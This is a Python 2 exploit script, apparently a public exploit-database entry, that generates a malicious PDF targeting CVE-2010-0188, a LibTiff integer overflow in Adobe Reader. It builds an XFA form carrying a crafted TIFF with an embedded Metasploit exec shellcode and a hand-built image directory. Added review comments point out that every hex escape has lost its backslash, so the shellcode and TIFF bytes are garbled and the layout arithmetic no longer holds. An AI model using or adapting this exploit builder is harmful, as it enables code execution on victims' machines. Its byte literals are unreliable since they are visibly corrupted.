# Title : Adobe Reader PDF LibTiff Integer Overflow Code Execution
# Published : 2010-03-17
# Author : villy
# Module docstring, assigned explicitly so the entry point can print it with ``print __doc__``.
# It is runtime data (the banner the tool prints), so its text is left exactly as the author wrote it.
__doc__='''
Title: Adobe PDF LibTiff Integer Overflow Code Execution.
Product: Adobe Acrobat Reader
Version: <=8.3.0, <=9.3.0
CVE: 2010-0188
Author: villy (villys777 at gmail.com)
Site: http://bugix-security.blogspot.com/
Tested : succesfully tested on Adobe Reader 9.1/9.2/9.3 OS Windows XP(SP2,SP3)
------------------------------------------------------------------------
'''
import sys
import base64
import struct
import zlib
import StringIO
# Number of repetitions of the filler literal that gen_tiff() places before the shellcode.
SHELLCODE_OFFSET=0x555
# Value written into the TIFF header as the offset of the first IFD; gen_tiff() pads
# header + filler + shellcode + filler up to this size so the IFD starts there.
TIFF_OFSET=0x2038
# windows/exec - 227 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=process, CMD=calc.exe
# NOTE(review): as reproduced on this page the backslash of every "\x" escape is missing, so
# ``buf`` is an ordinary ASCII string of letters and digits, not the 227-byte payload the
# metasploit banner above describes, and its length differs from 227.  Analysts should not
# lift these literals as byte signatures; the banner identifies the payload as a
# proof-of-concept that only launches calc.exe.
buf = "x2bxc9xd9xc0xd9x74x24xf4x5exb1x33xbaxd9xb4"
buf += "x0axbex31x56x15x03x56x15x83x1fxb0xe8x4bx63"
buf += "x51x65xb3x9bxa2x16x3dx7ex93x04x59x0bx86x98"
buf += "x29x59x2bx52x7fx49xb8x16xa8x7ex09x9cx8exb1"
buf += "x8ax10x0fx1dx48x32xf3x5fx9dx94xcax90xd0xd5"
buf += "x0bxccx1bx87xc4x9bx8ex38x60xd9x12x38xa6x56"
buf += "x2ax42xc3xa8xdfxf8xcaxf8x70x76x84xe0xfbxd0"
buf += "x35x11x2fx03x09x58x44xf0xf9x5bx8cxc8x02x6a"
buf += "xf0x87x3cx43xfdxd6x79x63x1exadx71x90xa3xb6"
buf += "x41xebx7fx32x54x4bx0bxe4xbcx6axd8x73x36x60"
buf += "x95xf0x10x64x28xd4x2ax90xa1xdbxfcx11xf1xff"
buf += "xd8x7axa1x9ex79x26x04x9ex9ax8exf9x3axd0x3c"
buf += "xedx3dxbbx2axf0xccxc1x13xf2xcexc9x33x9bxff"
buf += "x42xdcxdcxffx80x99x13x4ax88x8bxbbx13x58x8e"
buf += "xa1xa3xb6xccxdfx27x33xacx1bx37x36xa9x60xff"
buf += "xaaxc3xf9x6axcdx70xf9xbexaex17x69x22x1fxb2"
buf += "x09xc1x5fx00"
class CVE20100188Exploit:
    """Build a PDF whose embedded XFA form carries a crafted TIFF in an image field.

    Output structure (see gen_pdf): the XDP document from gen_xml is zlib-compressed and
    stored as PDF object 1, an embedded-file stream with ``/Filter /FlateDecode``; the
    catalog's AcroForm (object 8) references it via ``/XFA [(template) 1 0 R]``.  The XDP
    document contains a single ``ImageField1`` whose ``xfa:contentType="image/tif"`` data
    is the base64 encoding of gen_tiff().

    Detection notes, all derived from what this class emits: a FlateDecode embedded stream
    holding an XDP document with an ``image/tif`` image field; a TIFF whose header points
    to an IFD at TIFF_OFSET, preceded by a long run of identical filler; and a trailer whose
    ``startxref`` is a fixed literal with no real xref table.  The affected product/version
    range is the one given in the module docstring; patched versions are not listed here.
    """
    def __init__(self,shellcode):
        """Keep *shellcode* and precompute the base64 TIFF that gen_xml() embeds."""
        self.shellcode = shellcode
        # gen_tiff() reads self.shellcode, so the attribute must be assigned first.
        self.tiff64=base64.b64encode(self.gen_tiff())
    def gen_tiff(self):
        """Return the crafted TIFF as a str: header, filler, shellcode, filler, then a fixed IFD.

        NOTE(review): as printed on this page every backslash-x escape has lost its
        backslash, so the literals below are plain ASCII and the length arithmetic no
        longer matches the intended layout.  Do not use these literals as byte patterns.
        """
        # Intended as the little-endian TIFF magic ("II", 42, 0) followed by the 4-byte
        # offset of the first IFD, which is TIFF_OFSET.
        tiff = 'x49x49x2ax00'
        tiff += struct.pack("<L", TIFF_OFSET)
        # Filler before the shellcode; 0x90 is the x86 NOP the author evidently intended.
        tiff += 'x90' * (SHELLCODE_OFFSET)
        tiff += self.shellcode
        # Pad so the IFD begins exactly at TIFF_OFSET (8 = TIFF header length).  Note this
        # uses the module-level ``buf``, not ``self.shellcode``, so the layout is only
        # consistent when the instance was constructed with ``buf``.
        tiff += 'x90' * (TIFF_OFSET - 8 - len(buf) - SHELLCODE_OFFSET)
        # Image File Directory: a 2-byte entry count (7) followed by 12-byte entries and
        # trailing data.  Read as little-endian, the sixth entry carries tag 0x0150 with a
        # count of 0xCC; this directory is the part specific to the LibTiff bug named in the
        # title and is reproduced verbatim, so it is the signature-relevant portion.
        tiff += "x07x00x00x01x03x00x01x00"
        tiff += "x00x00x30x20x00x00x01x01x03x00x01x00x00x00x01x00"
        tiff += "x00x00x03x01x03x00x01x00x00x00x01x00x00x00x06x01"
        tiff += "x03x00x01x00x00x00x01x00x00x00x11x01x04x00x01x00"
        tiff += "x00x00x08x00x00x00x17x01x04x00x01x00x00x00x30x20"
        tiff += "x00x00x50x01x03x00xCCx00x00x00x92x20x00x00x00x00"
        tiff += "x00x00x00x0Cx0Cx08x24x01x01x00xF7x72x00x07x04x01"
        tiff += "x01x00xBBx15x00x07x00x10x00x00x4Dx15x00x07xBBx15"
        tiff += "x00x07x00x03xFEx7FxB2x7Fx00x07xBBx15x00x07x11x00"
        tiff += "x01x00xACxA8x00x07xBBx15x00x07x00x01x01x00xACxA8"
        tiff += "x00x07xF7x72x00x07x11x00x01x00xE2x52x00x07x54x5C"
        tiff += "x00x07xFFxFFxFFxFFx00x01x01x00x00x00x00x00x04x01"
        tiff += "x01x00x00x10x00x00x40x00x00x00x31xD7x00x07xBBx15"
        tiff += "x00x07x5Ax52x6Ax02x4Dx15x00x07x22xA7x00x07xBBx15"
        tiff += "x00x07x58xCDx2Ex3Cx4Dx15x00x07x22xA7x00x07xBBx15"
        tiff += "x00x07x05x5Ax74xF4x4Dx15x00x07x22xA7x00x07xBBx15"
        tiff += "x00x07xB8x49x49x2Ax4Dx15x00x07x22xA7x00x07xBBx15"
        tiff += "x00x07x00x8BxFAxAFx4Dx15x00x07x22xA7x00x07xBBx15"
        tiff += "x00x07x75xEAx87xFEx4Dx15x00x07x22xA7x00x07xBBx15"
        tiff += "x00x07xEBx0Ax5FxB9x4Dx15x00x07x22xA7x00x07xBBx15"
        tiff += "x00x07xE0x03x00x00x4Dx15x00x07x22xA7x00x07xBBx15"
        tiff += "x00x07xF3xA5xEBx09x4Dx15x00x07x22xA7x00x07xBBx15"
        tiff += "x00x07xE8xF1xFFxFFx4Dx15x00x07x22xA7x00x07xBBx15"
        tiff += "x00x07xFFx90x90x90x4Dx15x00x07x22xA7x00x07xBBx15"
        tiff += "x00x07xFFxFFxFFx90x4Dx15x00x07x31xD7x00x07x2Fx11"
        tiff += "x00x07"
        return tiff
    def gen_xml(self):
        """Return the XDP/XFA document as a str.

        Everything is a static Designer-exported form (config, template with one
        ``ImageField1`` image field, PDFSecurity flags, and a form packet with a fixed
        ``checksum`` attribute); the only variable part is the base64 TIFF spliced into
        ``ImageField1``'s data under ``xfa:contentType="image/tif"``.
        """
        xml= '''<?xml version="1.0" encoding="UTF-8" ?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config xmlns="http://www.xfa.org/schema/xci/1.0/">
<present>
<pdf>
<version>1.65</version>
<interactive>1</interactive>
<linearized>1</linearized>
</pdf>
<xdp>
<packets>*</packets>
</xdp>
<destination>pdf</destination>
</present>
</config>
<template baseProfile="interactiveForms" xmlns="http://www.xfa.org/schema/xfa-template/2.4/">
<subform name="topmostSubform" layout="tb" locale="en_US">
<pageSet>
<pageArea id="PageArea1" name="PageArea1">
<contentArea name="ContentArea1" x="0pt" y="0pt" w="612pt" h="792pt" />
<medium short="612pt" long="792pt" stock="custom" />
</pageArea>
</pageSet>
<subform name="Page1" x="0pt" y="0pt" w="612pt" h="792pt">
<break before="pageArea" beforeTarget="#PageArea1" />
<bind match="none" />
<field name="ImageField1" w="28.575mm" h="1.39mm" x="37.883mm" y="29.25mm">
<ui>
<imageEdit />
</ui>
</field>
<?templateDesigner expand 1?>
</subform>
<?templateDesigner expand 1?>
</subform>
<?templateDesigner FormTargetVersion 24?>
<?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?>
<?templateDesigner Zoom 94?>
</template>
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
<xfa:data>
<topmostSubform>
<ImageField1 xfa:contentType="image/tif" href="">'''+self.tiff64 +'''</ImageField1>
</topmostSubform>
</xfa:data>
</xfa:datasets>
<PDFSecurity xmlns="http://ns.adobe.com/xtd/" print="1" printHighQuality="1" change="1" modifyAnnots="1" formFieldFilling="1" documentAssembly="1" contentCopy="1" accessibleContent="1" metadata="1" />
<form checksum="a5Mpguasoj4WsTUtgpdudlf4qd4=" xmlns="http://www.xfa.org/schema/xfa-form/2.8/">
<subform name="topmostSubform">
<instanceManager name="_Page1" />
<subform name="Page1">
<field name="ImageField1" />
</subform>
<pageSet>
<pageArea name="PageArea1" />
</pageSet>
</subform>
</form>
</xdp:xdp>
'''
        return xml
    def gen_pdf(self):
        """Return the complete PDF as a str.

        The XDP from gen_xml() is zlib-compressed and written as object 1, an embedded
        file stream with ``/Filter /FlateDecode`` and a ``/Length`` computed from the
        compressed data.  Objects 2-4 form the field hierarchy, 5 and 6 the page tree,
        7 the catalog (``/PageMode /UseAttachments``, ``/AcroForm 8 0 R``) and 8 the
        AcroForm whose ``/XFA`` array points back at object 1.  No cross-reference table
        is written: ``xref`` is tacked onto the last ``endobj`` and ``startxref`` is the
        hard-coded value 14765, so opening the file presumably depends on the reader's
        xref repair logic -- not verified here.
        """
        xml = zlib.compress(self.gen_xml())
        pdf='''%PDF-1.6
1 0 obj
<</Filter /FlateDecode/Length ''' + str(len(xml)) + '''/Type /EmbeddedFile>>
stream
''' + xml+'''
endstream
endobj
2 0 obj
<</V () /Kids [3 0 R] /T (topmostSubform[0]) >>
endobj
3 0 obj
<</Parent 2 0 R /Kids [4 0 R] /T (Page1[0])>>
endobj
4 0 obj
<</MK <</IF <</A [0.0 1.0]>>/TP 1>>/P 5 0 R/FT /Btn/TU (ImageField1)/Ff 65536/Parent 3 0 R/F 4/DA (/CourierStd 10 Tf 0 g)/Subtype /Widget/Type /Annot/T (ImageField1[0])/Rect [107.385 705.147 188.385 709.087]>>
endobj
5 0 obj
<</Rotate 0 /CropBox [0.0 0.0 612.0 792.0]/MediaBox [0.0 0.0 612.0 792.0]/Resources <</XObject >>/Parent 6 0 R/Type /Page/PieceInfo null>>
endobj
6 0 obj
<</Kids [5 0 R]/Type /Pages/Count 1>>
endobj
7 0 obj
<</PageMode /UseAttachments/Pages 6 0 R/MarkInfo <</Marked true>>/Lang (en-us)/AcroForm 8 0 R/Type /Catalog>>
endobj
8 0 obj
<</DA (/Helv 0 Tf 0 g )/XFA [(template) 1 0 R]/Fields [2 0 R]>>
endobj xref
trailer
<</Root 7 0 R/Size 9>>
startxref
14765
%%EOF'''
        return pdf
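if __name__=="__main__":
    # Command-line entry point: print the banner, check the argument count, write the
    # generated PDF to the path given as the single argument.
    print __doc__
    # Stop after printing usage: the original fell through and then died with an
    # IndexError on sys.argv[1] whenever the argument was missing.
    if len(sys.argv) != 2:
        print "Usage: %s [output.pdf]" % sys.argv[0]
        sys.exit(1)
    print "Creating Exploit to %sn"% sys.argv[1]
    exploit=CVE20100188Exploit(buf)
    # Context manager closes the handle even if gen_pdf() raises part-way through.
    with open(sys.argv[1],mode='wb') as f:
        f.write(exploit.gen_pdf())
    print "[+] done !"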